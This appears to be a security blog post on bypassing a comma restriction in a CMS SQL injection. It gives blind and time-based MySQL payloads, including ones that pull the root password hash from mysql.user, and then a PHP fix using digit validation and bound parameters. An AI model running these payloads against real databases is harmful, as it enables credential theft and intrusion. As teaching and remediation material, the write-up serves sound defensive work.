[SQLi] Do not use single quotes | SQL statement with commas (,)
Background
While auditing a CMS, I found code like this:
$l_id = get('arr', 'l_id');
$ids = explode(',', $l_id);
The array parameter from the POST request is concatenated, then split on commas (,), and the pieces finally end up in an SQL query.
As a result, the injected SQL cannot contain commas.
Default
display_errors = Off
No errors are displayed, so only blind injection is possible.
Solution:
This mainly works around the commas in substring(), using the FROM ... FOR form instead.

select * from table1 where id = 1 and exists (select * from table2 where ord(substring(username from 1 for 1)) = 97);

127' UNION SELECT * FROM (SELECT 1) a JOIN (SELECT 2) b JOIN (SELECT 3) c JOIN (SELECT 4) d JOIN (SELECT 5) e) #

select case when substring((select password from mysql.user where user = 'root') from 1 for 1) = 'E' then sleep(5) else 0 end #

substring((select password from mysql.user where user = 'root') from -1) = 'E'
Adapt the preceding examples to your own situation.
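
The code in the Background section splits the parameter on commas but still passes each piece into the query, so the split is not a filter. The following is an added example, not the CMS's own code, of one way to close this in PHP: accept only all-digit pieces and bind each one as a parameter. The `article` table, the functions `parse_id_list` and `fetch_by_ids`, and the in-memory SQLite database (pdo_sqlite) are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example. Table "article" and its columns are hypothetical; an
// in-memory SQLite database stands in for the CMS database.

/** Split a comma-separated id list; reject any piece that is not all digits. */
function parse_id_list(string $raw, int $max = 100): array
{
    $ids = [];
    foreach (explode(',', $raw) as $piece) {
        $piece = trim($piece);
        // ctype_digit() is false for '', signs, inner spaces, quotes and keywords.
        if (!ctype_digit($piece)) {
            throw new InvalidArgumentException('id list must contain only integers');
        }
        $ids[] = (int) $piece;
    }
    if (count($ids) > $max) {
        throw new InvalidArgumentException('too many ids');
    }
    return $ids;
}

/** Fetch rows with one bound placeholder per id; no input is concatenated into SQL. */
function fetch_by_ids(PDO $pdo, array $ids): array
{
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare("SELECT id, title FROM article WHERE id IN ($marks)");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO article VALUES (1, 'first'), (2, 'second'), (3, 'third')");

// Constructed inputs: a normal id list, then one carrying a comma-free condition.
foreach (['1,3', '1 and exists (select 1)'] as $raw) {
    try {
        $rows = fetch_by_ids($pdo, parse_id_list($raw));
        echo $raw, ' => ', json_encode(array_column($rows, 'title')), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $raw, ' => rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Because the SQL text is built only from `?` placeholders, the outcome no longer depends on which characters the input contains or lacks.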